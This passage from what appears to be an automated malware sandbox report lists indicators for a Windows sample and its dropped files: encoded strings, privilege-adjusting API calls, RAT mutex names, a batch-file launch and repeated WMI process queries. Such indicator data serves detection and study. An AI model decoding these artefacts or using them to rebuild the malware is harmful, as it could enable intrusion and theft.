=', 'tyTrT6GGos12JNDuBjV7r8CixV0LacRE7AF2g9EWq6/R+2nMD9mZ+KPwQ+N/FfHMi+w2p5ekL1kpn21yEi8bfYbaatDjWVb3zASbMm2SmNHph47j9t6DL7qYFDexgwmIGKDQ4kH4jce5KPGO4BWdPFDe11ejE6yWVlAgc676IaK14uxXNsQLDWeyKf9wHVWmopzrbsRJ7QY6bjeiGQtdAAXjvp+T2rW8yIJD8n9eaiUcMJ8xkIfJQ4Kf++5azU1/jVFMErtEs2GPdmzDGPwEXRCBL/Ieu94adJa0kf1UYZjk4sDQeHf88jirx2gT30ZRuUPvvUrGFUDB+DwoKssDWoHssnSjzorLh2ZWdANVOxctqsQJdNo
Source: accc.exe.5.dr, vrSIoVmYiYR.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
Source: accc.exe.5.dr, llelyKwxZfhStIQ.cs	Base64 encoded string: 'H4sIAAAAAAAEAMstzSnJLEgsKtFPyy/K1U1JLEm0VkjKL81LSSyqtAUAyUCMlh4AAAA=', 'H4sIAAAAAAAEANPVrTao5eVyzs8rSc0r0XXJLC7IL84syczPs1JIyy/K1U1JLEm0VshLzE21VUrJTy7NBSpTslZIy8xJhQhWG9YqIQwIqSxItVKoNgKayctVbQykdEE26OrycgEAzjDM6WsAAAA='
Source: accc.exe.5.dr, RXCuhMXrVyLpv.cs	Base64 encoded string: 'H4sIAAAAAAAEAItJzs/Vy8lMSi0qqdTLSqyoiPHMS0mtSE1xcYpJy8xJjY830MuEiKQk6eWklqXmpCQBALyHY/o1AAAA', 'H4sIAAAAAAAEAItJLMnPzUyO8clPTsxRCC7JL0pMT43JSS1LzUlJAgDKQ2GtHQAAAA==', 'H4sIAAAAAAAEAItxL00sSkmM8clPTsxRCC7JL0pMT43JSS1LzUlJAgA2We33HQAAAA==', 'H4sIAAAAAAAEAItxzs/My8/NjIHR5Yk5OaklxQCs8h9VGAAAAA==', 'H4sIAAAAAAAEAEssKMjJTE4syczP06/QzS3WTckv1k2tSE0uLUlMykkFAKom4IQfAAAA', 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1LcclPLs1NzSuxT85ILInPTLEFAKsueU0WAAAA'
Source: accc.exe.5.dr, HCrlHwiwwszWU.cs	Base64 encoded string: 'H4sIAAAAAAAEACsNjcosKKpM8/K2zC9yNivPDyl2y8nwdS0KizRMMzevAgB4DFSeIAAAAA==', 'H4sIAAAAAAAEADMzsDAytjA0NTCycnR0dU01TQkrC/ZNcU3TjU/zDs0wzwwqTPYrzTMONHWpqvAFAGbJrNwuAAAA', 'H4sIAAAAAAAEAGWPT0rDQBjF94Xe4buB++xCM9JAwGBSim5ceQFdDkJrKwgKxSotFqSbHmAMRqPRnOF9V/AC9gh+39Q/oLuZN+/93pv1cjWjOAqIbLcfRyft1np5taLe8eFRQLaXmd2048XrM8INHJ/CEY94qAe8oUGBF1RbeJK3gUiPKEWueCLxKMyNhN8Xtx/VhGwa5l1/nekVU5Q8JNyjQo0Hwdos3je+bD4lLNDwucBqvtQGEqrDsxiFzxekinTi1fd9aQXx2LtqOOnfjhOTCRB3v1E1oiRB/sEXMkU+NpZVAzU0smwDd0G7ZTs76d5BP0wSkytx/lOt6zfr/kE1l5n8O/YJ69jp2GwBAAA=', 'H4sIAAAAAAAEADM0Tw5wdg8tK/OK9HErcqpKNXSqSo4oKvY1S3dKczX0CYkEADv7vKUiAAAA', 'H4sIAAAAAAAEADM0Tw5wdg8tK/OK9HErcqpKNXSqSo4oKvY1S3dKczX0CYkEADv7vKUiAAAA', 'H4sIAAAAAAAEACssMi+yLDc2Mcgoy6sozMo1Ss4qyDLOTjEoNs9OqzIwyi42LS41yyiqSgUA80+qVCoAAAA=', 'H4sIAAAAAAAEAHMJtUhKco50r8gyTko1jnDxzcws8PVKcXNz90gvd6nycTIFAGsQREkiAAAA', 'H4sIAAAAAAAEAAXBCQEAIAgDwEp8zhlHUDIY3zt5ttFamuRAtN0jsDCmUMsLxKBPrvrTZDt6KgAAAA==', 'H4sIAAAAAAAEAPPJdAnxtiwNyaoM8PMtMsrNd8+MMo2KCEz0KUvLrnQ3jDQHAL4F40AiAAAA', 'H4sIAAAAAAAEADOxLCypKC0rCTD3jgovLaoMD7VIdsp1r6w0z3IqN3E2Tk0L9a5yLgzKdbYo9jZMCsoIrgxxK4owTA9x8g2PdDSr9ErMyCuOcI/MzTTLrAwzdHH3qHD0Lal09PWJjCgMBwD0oyzvXwAAAA==', 'H4sIAAAAAAAEAHN3ijJz8QtxK4owTA9x8g2PdDSr9ErMyCuOcI/MzTTLrAwzdHH3qHAMcvV1j3B3cfR2cjMNDzf1BwCczo9yOAAAAA==', 'H4sIAAAAAAAEACvyS04xNE8OcHYPLSvzivRxK3KqSjV0qkqOKCr2NUt3SnM19AmJBAABckyEJgAAAA==', 'H4sIAAAAAAAEAHP0cnE3jQgNdDEJyA9ONHNzNLEwSfV1C8svcAxxSs2scskCAEnCho0iAAAA', 'H4sIAAAAAAAEAAtxK4owTA9x8g2PdDSr9ErMyCuOcI/MzTTLrAwzdHH3qHAEABQL/CkiAAAA', 'H4sIAAAAAAAEACsxNE8OcHYPLSvzivRxK3KqSjV0qkqOKCr2NUt3SnM19AmJBAA0SDlRIwAAAA==', 'H4sIAAAAAAAEAEvKSzK0MC0rKC0yzkkuybDMMTc3LyotyEquzCgsLyg2KDfNSbcwMi8vMwUATJpbXyoAAAA=', 'H4sIAAAAAAAEANPSS87PS8tM19HSSy4GEjn5IGZ5Yk5OaglIrKAASGYAcUlFCUQapColCUgkpQAAEUdo4T0AAAA='
Source: accc.exe.5.dr, CwkOLYwEiqNy.cs	Base64 encoded string: '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
Source: accc.exe.5.dr, Dbkufbnkyis.cs	Base64 encoded string: 'H4sIAAAAAAAEAItJijY0jo1O1K1y1PXw0vUL0I0y0LWMrTYy0zE2rY1JAgA/kBJeIAAAAA==', 'H4sIAAAAAAAEAItJ0khK1jDQiE5M1s3I0s0r0K0yMNK1jK02tqytwRA0tazVrDHEELbQsTCv1dSMSQIAmnZO4E4AAAA=', 'H4sIAAAAAAAEAItJMqiITtRNc9R1M9C1jK02MaiNSQIAq44emBUAAAA=', 'H4sIAAAAAAAEAItJijaxiI020LV0dIqNNgRSuh5eun4BulGJutm5ulWx1ZbGtTFJAKXtzMonAAAA', 'H4sIAAAAAAAEAItJco820LVM1K1y1I2KrTY1rY1JAgBrh5bZFAAAAA==', 'H4sIAAAAAAAEAItJKoouKijOyEtMM7Ysdwp18XN19/Dy9vE1CQgMCg4xDwuPiIwySkpOSXVONzPNys61yHcrzDQsKS1zrKisiq02MtExNqmNSQIAQVwclkgAAAA=', 'H4sIAAAAAAAEAItJcow20LVM1K1y1I2KrTY2ro1JAgCSkcF9FAAAAA==', 'H4sIAAAAAAAEAItJ0tBIyixJzs/MS04szrDStNcorCnQjE7UrTLQtYytNjGs1YxJAgBI3BA7JgAAAA==', 'H4sIAAAAAAAEAItJivbxjY1O1M3O1a1y1PXw0vUL0I0y1LWMrTYy0zE2ro1JAgBbyj43IwAAAA==', 'H4sIAAAAAAAEAItJcqk2rI021bV01PXw0vUL0A2NBQkYIgSiEnWzc3WrYquNjWpjkgArcHyrMQAAAA==', 'H4sIAAAAAAAEAItJiog21LV01PXw0vUL0I1K1M3O1a2KrTY2ro1JAgANsrq/HQAAAA==', 'H4sIAAAAAAAEAItJColO1K1y1I0y0LWMrTay0DE2ro1JAgCQuGQ4FwAAAA==', 'H4sIAAAAAAAEAItJKjGMNtC1dNStiq02Nq6NSQIA8OfYfRIAAAA=', 'H4sIAAAAAAAEAItJ0kjKS9LUiE7UrTLQtYytNras1YxJAgAS93gFFwAAAA=='
Source: accc.exe.5.dr, FlkCRXUvHcR.cs	Base64 encoded string: 'H4sIAAAAAAAEAAvOTyspTyxKjfHNTC7KLwbyYsIz81Lyy4tjnEuLilLzSsJSi4oz8/NigkrzAHLTHVUtAAAA'
Source: accc.exe.5.dr, yfwLUpaytDvy.cs	Base64 encoded string: 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0EvJydFLzs8tKEotLk5NAQBlAxhYIAAAAA==', 'H4sIAAAAAAAEAEvOLy4pLUrUS8kvyUstqcos0CtISdJLzs8tKEotLk5NAQBhsDSUIAAAAA=='

Source: accc.exe.5.dr, GGHFLhBdcqzlyt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: accc.exe.5.dr, GGHFLhBdcqzlyt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 53A5.tmp.update.exe.2.dr, QAeLOkPOHZsV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 53A5.tmp.update.exe.2.dr, QAeLOkPOHZsV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5E16.tmp.aaa.exe.2.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5E16.tmp.aaa.exe.2.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4336.tmp.Server.exe.2.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4336.tmp.Server.exe.2.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 476D.tmp.Server.exe.2.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 476D.tmp.Server.exe.2.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5087.tmp.update.exe.2.dr, QAeLOkPOHZsV.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 5087.tmp.update.exe.2.dr, QAeLOkPOHZsV.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 3CBD.tmp.Installer.exe.2.dr, GGHFLhBdcqzlyt.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 3CBD.tmp.Installer.exe.2.dr, GGHFLhBdcqzlyt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 4BC4.tmp.Client.exe.2.dr, Help.cs

Suspicious URL: 'https://api.vimeworld.ru/user/name/'

Source: classification engine

Classification label: mal100.rans.phis.troj.adwa.spyw.evad.mine.winEXE@97/413@19/15

Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A18878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,FindCloseChangeNotification,free,	0_2_00007FF68A18878C
Source: C:\Users\user\Desktop\xj40xovMsm.exe	Code function: 0_2_00007FF68A1820C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	0_2_00007FF68A1820C0
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA33878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,	47_2_00007FF6AA33878C
Source: C:\Windows\System32\relog.exe	Code function: 47_2_00007FF6AA3320C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	47_2_00007FF6AA3320C0
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B0878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,	52_2_00007FF7C9B0878C
Source: C:\Users\user\AppData\Roaming\{B955B2CC07A01546086603}\Service_{B955B2CC07A01546086603}.exe	Code function: 52_2_00007FF7C9B020C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	52_2_00007FF7C9B020C0
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE48878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,	53_2_00007FF7AE48878C
Source: C:\Windows\System32\relog.exe	Code function: 53_2_00007FF7AE4820C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	53_2_00007FF7AE4820C0
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C878C GetCurrentProcess,OpenProcessToken,GetTokenInformation,malloc,GetTokenInformation,AdjustTokenPrivileges,CloseHandle,free,	55_2_00007FF7C07C878C
Source: C:\Windows\System32\relog.exe	Code function: 55_2_00007FF7C07C20C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	55_2_00007FF7C07C20C0

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A187530 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00007FF68A187530

Source: C:\Users\user\Desktop\xj40xovMsm.exe

Code function: 0_2_00007FF68A187C00 SHGetFolderPathW,CoInitialize,CoCreateInstance,CoUninitialize,

0_2_00007FF68A187C00

Source: C:\Users\user\Desktop\xj40xovMsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\zbi[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\relog.exe	Mutant created: \Sessions\1\BaseNamedObjects\ZBI
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\ProgramData\KMSAuto\accc.exe	Mutant created: \Sessions\1\BaseNamedObjects\uUZipryfJK9orC6woTsFlhMErVY1f77z
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe	Mutant created: \Sessions\1\BaseNamedObjects\Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
Source: C:\Users\user\AppData\Roaming\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\qV8NRtqxj5c3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03

Source: C:\Users\user\Desktop\xj40xovMsm.exe

File created: C:\Users\user\AppData\Local\Temp\SystemUpdate.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\3CBD.tmp.Installer.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp4F89.tmp.bat""

Source: xj40xovMsm.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: xj40xovMsm.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 43.44%

Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
